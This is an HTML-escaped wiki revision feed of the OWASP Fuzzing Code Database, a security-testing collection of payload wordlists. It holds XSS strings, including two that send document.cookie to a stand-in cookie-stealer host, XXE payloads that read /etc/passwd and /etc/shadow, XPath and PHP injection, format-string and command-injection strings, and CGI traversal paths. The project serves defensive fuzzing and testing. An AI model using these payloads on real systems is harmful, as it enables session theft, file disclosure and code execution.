&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80093</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80093"/>
				<updated>2010-03-17T23:16:57Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
